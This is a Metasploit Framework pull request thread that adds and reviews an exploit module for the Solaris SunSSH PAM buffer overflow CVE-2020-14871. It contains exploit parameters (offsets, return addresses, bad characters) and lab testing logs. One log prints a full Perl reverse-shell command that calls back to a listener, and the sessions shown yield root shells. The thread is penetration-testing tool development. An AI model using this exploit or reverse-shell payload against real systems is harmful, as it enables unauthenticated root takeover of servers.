### PR TITLE
Add Oracle Solaris SunSSH PAM parse_user_name() exploit (CVE-2020-14871)

### PR DESCRIPTION
**Pull request by wvu**
```
msf6 exploit(solaris/ssh/pam_username_bof) > info

       Name: Oracle Solaris SunSSH PAM parse_user_name() Buffer Overflow
     Module: exploit/solaris/ssh/pam_username_bof
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2020-10-20

Provided by:
  Jacob Thompson
  Aaron Carreras
  Jeffrey Martin
  Hacker Fantastic
  wvu <wvu@metasploit.com>

Module side effects:
 account-lockouts
 ioc-in-logs

Module stability:
 crash-service-restarts

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VMware
  1   SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VirtualBox

Check supported:
  Yes

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT   22               yes       The target port

Payload information:
  Avoid: 3 characters

Description:
  This module exploits a stack-based buffer overflow in the Solaris
  PAM library's username parsing code, as used by the SunSSH daemon
  when the keyboard-interactive authentication method is specified.
  Tested against SunSSH 1.1.5 on Solaris 10u11 1/13 (x86) in
  VirtualBox, VMware Fusion, and VMware Player. Bare metal untested.
  Your addresses may vary.

References:
  https://cvedetails.com/cve/CVE-2020-14871/
  https://www.oracle.com/security-alerts/cpuoct2020.html
  https://www.fireeye.com/blog/threat-research/2020/11/critical-buffer-overflow-vulnerability-in-solaris-can-allow-remote-takeover.html
  https://hacker.house/lab/cve-2020-18471/
  https://twitter.com/hackerfantastic/status/1323431512822435841

msf6 exploit(solaris/ssh/pam_username_bof) >
```

### CODE REVIEW

File: modules/exploits/solaris/ssh/pam_username_bof.rb [hunk 1]
```diff
@@ -0,0 +1,128 @@
...
+        'Privileged' => true,
+        'Payload' => {
+          # https://github.com/illumos/illumos-gate/blob/edd669a7ce20a2f7406e8f00489c426c0690f1bd/usr/src/lib/libpam/pam_framework.c#L615-L617
+          'BadChars' => "\x00\x09\x20",
+          'Encoder' => 'cmd/perl',
+          'PrependEncoder' => "#{'/' * 512}/usr/bin/" # HACK: NOP sled...
+        },
+        'Targets' => [
+          [
+            'SunSSH 1.1.5 / Solaris 10 1/13 (x86) / VirtualBox',
```
Comment (bcoles) [inline modules/exploits/solaris/ssh/pam_username_bof.rb:53]:
```suggestion
            'SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VirtualBox',
```

File: modules/exploits/solaris/ssh/pam_username_bof.rb [hunk 2]
```diff
@@ -0,0 +1,128 @@
...
+            {
+              'Offset' => 516,
+              'Ret' => 0x08043444,
+              'LibcBase' => 0xfeb80000
+            }
+          ],
+          [
+            'SunSSH 1.1.5 / Solaris 10 1/13 (x86) / VMware Fusion',
```
Comment (bcoles) [inline modules/exploits/solaris/ssh/pam_username_bof.rb:61]:
```suggestion
            'SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VMware Fusion',
```

**Review by bcoles — COMMENTED** [review]
Solaris versioning convention is confusing. `<version>u<update> <month>/<year>` is best.

http://web.archive.org/web/20190319025059/https://www.zjulian.com/solaris-10-release-table

**Comment by bcoles** [comment]
FWIW; VMWare Fusion target also works on VMware Player.

Although some issues with multiple sessions returned, some of which were dead.

```
msf6 > use exploit/solaris/ssh/pam_username_bof 
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(solaris/ssh/pam_username_bof) > set rhosts 172.16.191.210
rhosts => 172.16.191.210
msf6 exploit(solaris/ssh/pam_username_bof) > set verbose true
verbose => true
msf6 exploit(solaris/ssh/pam_username_bof) > show targest
[-] Invalid parameter "targest", use "show -h" for more information
msf6 exploit(solaris/ssh/pam_username_bof) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   SunSSH 1.1.5 / Solaris 10 1/13 (x86) / VirtualBox
   1   SunSSH 1.1.5 / Solaris 10 1/13 (x86) / VMware Fusion


msf6 exploit(solaris/ssh/pam_username_bof) > set target 1
target => 1
msf6 exploit(solaris/ssh/pam_username_bof) > set payload
payload => cmd/unix/reverse_perl
msf6 exploit(solaris/ssh/pam_username_bof) > options

Module options (exploit/solaris/ssh/pam_username_bof):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  172.16.191.210   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   22               yes       The target port


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   SunSSH 1.1.5 / Solaris 10 1/13 (x86) / VMware Fusion


msf6 exploit(solaris/ssh/pam_username_bof) > set lhost 172.16.191.165 
lhost => 172.16.191.165
msf6 exploit(solaris/ssh/pam_username_bof) > run

[+] perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"172.16.191.165:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Exploiting SunSSH 1.1.5 / Solaris 10 1/13 (x86) / VMware Fusion
[*] Yeeting cmd/unix/reverse_perl at 172.16.191.210:22
[*] Command shell session 1 opened (172.16.191.165:4444 -> 172.16.191.208:55110) at 2020-11-30 21:35:37 -0500

id
pwd
/usr/bin/id




^Z
Background session 1? [y/N]  y

msf6 exploit(solaris/ssh/pam_username_bof) > sessions -i 1
[*] Starting interaction with 1...

id
pwd
ls
/usr/bin/id


^C
Abort session 1? [y/N]  y

[*] 172.16.191.210 - Command shell session 1 closed.  Reason: User exit
msf6 exploit(solaris/ssh/pam_username_bof) > 
msf6 exploit(solaris/ssh/pam_username_bof) > rexploit 
[*] Reloading module...

[+] perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"172.16.191.165:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Exploiting SunSSH 1.1.5 / Solaris 10 1/13 (x86) / VMware Fusion
[*] Yeeting cmd/unix/reverse_perl at 172.16.191.210:22
[*] Command shell session 3 opened (172.16.191.165:4444 -> 172.16.191.208:55114) at 2020-11-30 21:37:18 -0500
[*] Command shell session 4 opened (172.16.191.165:4444 -> 172.16.191.208:55116) at 2020-11-30 21:37:19 -0500
[*] Command shell session 5 opened (172.16.191.165:4444 -> 172.16.191.210:32896) at 2020-11-30 21:37:20 -0500

id
uid=0(root) gid=0(root)
pwd
/
ls
Desktop
Documents
TT_DB
bin
boot
cdrom
dev
devices
etc
export
home
kernel
lib
lost+found
mnt
net
opt
platform
proc
sbin
system
tmp
usr
var
vol
^C
Abort session 5? [y/N]  y

[*] 172.16.191.210 - Command shell session 5 closed.  Reason: User exit
msf6 exploit(solaris/ssh/pam_username_bof) > sessions -i 4
[*] Starting interaction with 4...

id
pwd
ls
^C
Abort session 4? [y/N]  y

[*] 172.16.191.210 - Command shell session 4 closed.  Reason: User exit
msf6 exploit(solaris/ssh/pam_username_bof) > sessions -i 3 
[*] Starting interaction with 3...

id
pwd
ls
^C
Abort session 3? [y/N]  y

[*] 172.16.191.210 - Command shell session 3 closed.  Reason: User exit
msf6 exploit(solaris/ssh/pam_username_bof) > sessions

Active sessions
===============

  Id  Name  Type   Information  Connection
  --  ----  ----   -----------  ----------
  2         shell               172.16.191.165:4444 -> 172.16.191.210:32895 (172.16.191.210)

msf6 exploit(solaris/ssh/pam_username_bof) > sessions -i 2
[*] Starting interaction with 2...

id
uid=0(root) gid=0(root)
^C
Abort session 2? [y/N]  y

[*] 172.16.191.210 - Command shell session 2 closed.  Reason: User exit
msf6 exploit(solaris/ssh/pam_username_bof) > 
msf6 exploit(solaris/ssh/pam_username_bof) > 
```

**Comment by wvu-r7** [comment]
@adfoster-r7: Can you take a quick look at the `Msf::Exploit::Remote::SSH` refactor to make sure I didn't miss anything? I just wanted to split up the auth methods into separate files.

File: documentation/modules/exploit/solaris/ssh/pam_username_bof.md [hunk 3]
```diff
@@ -0,0 +1,102 @@
...
+keyboard-interactive authentication method is specified.
+
+Tested against SunSSH 1.1.5 on Solaris 10u11 1/13 (x86) in VirtualBox,
+VMware Fusion, and VMware Player. Bare metal untested. Your addresses
+may vary.
+
+### Setup
+
+Download and install [Solaris 10u11 1/13
+(x86)](https://download.oracle.com/otn/solaris/10/sol-10-u11-ga-x86-dvd.iso)
```
Comment (smcintyre-r7) [inline documentation/modules/exploit/solaris/ssh/pam_username_bof.md:16]: Navigating directly to this link left me with an error from Oracle (after creating an account and logging in) that I hadn't agreed to the OTN License. This is the link that worked for me: https://www.oracle.com/solaris/solaris10/downloads/solaris10-get-jsp-downloads.html (Select Oracle Solaris 10 x86).

File: lib/msf/core/exploit/ssh.rb [hunk 4]
```diff
@@ -16,12 +16,24 @@ module Msf::Exploit::Remote::SSH
...
   #   fortinet-backdoor
+  #   libssh-auth-bypass
+  #   malformed-packet
   include Msf::Exploit::Remote::SSH::AuthMethods
 
   def ssh_socket_factory
     Rex::Socket::SSHFactory.new(framework, self, datastore['Proxies'])
   end
 
+  # TODO: Refactor this, lol
```
Comment (smcintyre-r7) [inline lib/msf/core/exploit/ssh.rb:28]: Does this still need to be refactored?

File: modules/exploits/solaris/ssh/pam_username_bof.rb [hunk 5]
```diff
@@ -0,0 +1,131 @@
...
+      )
+    )
+  end
+
+  def check
+    # Run auxiliary/scanner/ssh/ssh_version
+    super
+
+    # HACK: Return a CheckCode, since auxiliary/scanner/ssh/ssh_version doesn't
+    CheckCode::Unknown
```
Comment (smcintyre-r7) [inline modules/exploits/solaris/ssh/pam_username_bof.rb:85]: It doesn't look like `auxiliary/scanner/ssh/ssh_version` returns a `CheckCode`. It seems like it'd be useful to update it to return `CheckCode::Detected` (see PR #14294) when SSH is found and populate the new `details` hash with the fingerprint from `Recog::Nizer`. I think that would help prevent exploiting obviously non-Solaris systems.

File: documentation/modules/exploit/solaris/ssh/pam_username_bof.md (hunk 3 above)
Comment (wvu-r7) [reply documentation/modules/exploit/solaris/ssh/pam_username_bof.md:16]: Oh yeah, I must have already been logged in.

File: lib/msf/core/exploit/ssh.rb (hunk 4 above)
Comment (wvu-r7) [reply lib/msf/core/exploit/ssh.rb:28]: Yep. But it isn't a useful comment.

File: modules/exploits/solaris/ssh/pam_username_bof.rb (hunk 5 above)
Comment (wvu-r7) [reply modules/exploits/solaris/ssh/pam_username_bof.rb:85]: I thought about that, but this module doesn't use `AutoCheck`. ¯\\\_(ツ)_/¯

I guess I can do that.

File: lib/msf/core/exploit/ssh/auth_methods.rb [hunk 6]
```diff
@@ -1,193 +1,11 @@
...
-  end
+require 'msf/core/exploit/ssh/auth_methods/fortinet_backdoor'
+require 'msf/core/exploit/ssh/auth_methods/libssh_auth_bypass'
+require 'msf/core/exploit/ssh/auth_methods/malformed_packet'
 
+module Msf::Exploit::Remote::SSH::AuthMethods
+  include Msf::Exploit::Remote::SSH::AuthMethods::FortinetBackdoor
+  include Msf::Exploit::Remote::SSH::AuthMethods::LibsshAuthBypass
+  include Msf::Exploit::Remote::SSH::AuthMethods::MalformedPacket
 end
```
Comment (adfoster-r7) [inline lib/msf/core/exploit/ssh/auth_methods.rb:11]:
```suggestion
```

I might be missing something important, but I don't think this should be needed? 👀 

If I understand correctly the net ssh auth_methods are derived directly from `Net::SSH::Authentication::Methods` constants:

```
[1] pry(#<Net::SSH::Authentication::Session>)> whereami

From: /Users/adfoster/.rvm/gems/ruby-2.7.2@metasploit-framework/gems/net-ssh-6.1.0/lib/net/ssh/authentication/session.rb:80 Net::SSH::Authentication::Session#authenticate:

    75:               attempted << name
    76: 
    77:               debug { "trying #{name}" }
    78:               begin
    79:                 require 'pry'; binding.pry
 => 80:                 auth_class = Methods.const_get(name.split(/\W+/).map { |p| p.capitalize }.join)
    81:                 method = auth_class.new(self, key_manager: key_manager, password_prompt: options[:password_prompt])
    82:               rescue NameError
    83:                 debug {"Mechanism #{name} was requested, but isn't a known type.  Ignoring it."}
    84:                 next
    85:               end

[2] pry(#<Net::SSH::Authentication::Session>)> name.split(/\W+/).map { |p| p.capitalize }.join
=> "KeyboardInteractive"
[3] pry(#<Net::SSH::Authentication::Session>)> Methods
=> Net::SSH::Authentication::Methods
[4] pry(#<Net::SSH::Authentication::Session>)> Methods.constants
=> [:KeyboardInteractive, :Password, :Publickey, :MalformedPacket, :LibsshAuthBypass, :Hostbased, :Abstract, :None, :FortinetBackdoor]
```

And [includes](https://docs.ruby-lang.org/en/2.2.0/Module.html#method-i-include) may include constants, but those constants are already under the `Msf::Exploit::Remote::SSH::AuthMethods` namespace without this code:

```
[5] pry(#<Net::SSH::Authentication::Session>)> Msf::Exploit::Remote::SSH::AuthMethods.constants
=> [:FortinetBackdoor, :LibsshAuthBypass, :MalformedPacket]
```

So I _think_ this isn't needed? 🤞

**Comment by adfoster-r7** [comment]
Exploit works for me with vmware fusion:

```
[1] pry(#<Net::SSH::Authentication::Methods::KeyboardInteractive>)> continue
[*] Command shell session 2 opened (192.168.219.1:4444 -> 192.168.219.1:64607) at 2020-12-02 21:52:30 +0000

uname -a
SunOS unknown 5.10 Generic_147148-26 i86pc i386 i86pc
cat /etc/release
                    Oracle Solaris 10 1/13 s10x_u11wos_24a X86
  Copyright (c) 1983, 2013, Oracle and/or its affiliates. All rights reserved.
                            Assembled 17 January 2013
```

As already noted - the check support could be improved, it's marked as as not being able to reliably check the exploitability

```
[*] Using auxiliary/scanner/ssh/ssh_version as check
[+] 192.168.222.202:22    - SSH server version: SSH-2.0-Sun_SSH_1.1.5 ( service.version=1.1.5 service.vendor=Sun service.product=SSH os.vendor=Sun os.family=Solaris os.product=Solaris os.cpe23=cpe:/o:sun:solaris:- service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.222.202:22    - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.222.202:22 - Cannot reliably check exploitability.
```

Improving the check functionality would be great if it's not too much scope creep 😄

File: lib/msf/core/exploit/ssh/auth_methods.rb (hunk 6 above)
Comment (wvu-r7) [reply lib/msf/core/exploit/ssh/auth_methods.rb:11]: Oh, hmm, I'll check that out. Thanks!

Comment (wvu-r7) [reply lib/msf/core/exploit/ssh/auth_methods.rb:11]: Ah, looks like I packaged everything in individual classes already. I should need only `require`. Thanks for catching that!

**Comment by wvu-r7** [comment]
Review should be addressed. I have a refactor and targets for 11.0 and 10u10 to push.

**Comment by smcintyre-r7** [comment]
Yeah it looks like all the review comments were addressed and I'm ready to test and land this but it's still marked as a draft. Do you have plans to continue working on it?

Thanks for making those changes by the way, this looks great.

**Comment by wvu-r7** [comment]
Looks like there's a merge conflict from #14202. Fixing.

**Comment by dwelch-r7** [comment]
Travis failure is a minor Zeitwerk issue, I'm putting up a separate PR to resolve it

**Comment by adfoster-r7** [comment]
The PR to fix the failing tests (https://github.com/rapid7/metasploit-framework/pull/14481) was merged, this PR should be good to rebase/squash now 👍 

Sorry for the extra overhead!

**Comment by wvu-r7** [comment]
Bunch o' busy stuff. Unblocking this for 10u11 so it can land. I'll add the other targets later.

**Comment by smcintyre-r7** [comment]
It's working for me as it is intended to with a target of Solaris 10u11. I also tested the `ssh_version` module again to ensure that's still working.

<details>
<summary>Testing Output</summary>

```
msf6 exploit(solaris/ssh/pam_username_bof) > show options 

Module options (exploit/solaris/ssh/pam_username_bof):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  192.168.159.34   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   22               yes       The target port


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VMware


msf6 exploit(solaris/ssh/pam_username_bof) > check

[*] Using auxiliary/scanner/ssh/ssh_version as check
[+] 192.168.159.34:22     - SSH server version: SSH-2.0-Sun_SSH_1.1.5 ( service.version=1.1.5 service.vendor=Sun service.product=SSH os.vendor=Sun os.family=Solaris os.product=Solaris os.cpe23=cpe:/o:sun:solaris:- service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.159.34:22     - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.159.34:22 - The target appears to be vulnerable. SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VMware is a compatible target.
msf6 exploit(solaris/ssh/pam_username_bof) > exploit

[*] Started reverse TCP handler on 192.168.159.128:5555 
[*] Executing automatic check (disable AutoCheck to override)
[*] Using auxiliary/scanner/ssh/ssh_version as check
[+] 192.168.159.34:22     - SSH server version: SSH-2.0-Sun_SSH_1.1.5 ( service.version=1.1.5 service.vendor=Sun service.product=SSH os.vendor=Sun os.family=Solaris os.product=Solaris os.cpe23=cpe:/o:sun:solaris:- service.protocol=ssh fingerprint_db=ssh.banner )
[*] 192.168.159.34:22     - Scanned 1 of 1 hosts (100% complete)
[+] The target appears to be vulnerable. SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VMware is a compatible target.
[*] Exploiting SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VMware
[*] Yeeting cmd/unix/reverse_perl at 192.168.159.34:22
[*] Command shell session 1 opened (192.168.159.128:5555 -> 192.168.159.34:32795) at 2020-12-16 15:57:46 -0500

id
uid=0(root) gid=0(root)
pwd
/
^Z
Background session 1? [y/N]  
[*] Backgrounding foreground process in the shell session
```
</details>

I'll go ahead and merge this in since testing was successful and there don't appear to be any outstanding comments. Thanks @wvu-r7!

**Comment by smcintyre-r7** [comment]
# Release Notes
This adds an exploit for a vulnerability with the `parse_user_name()` function of the PAM module that is used by the Solaris SunSSH service. This allows an unauthenticated user to achieve remote code execution as root. The vulnerability is identified as CVE-2020-14871.

**Pull request merged**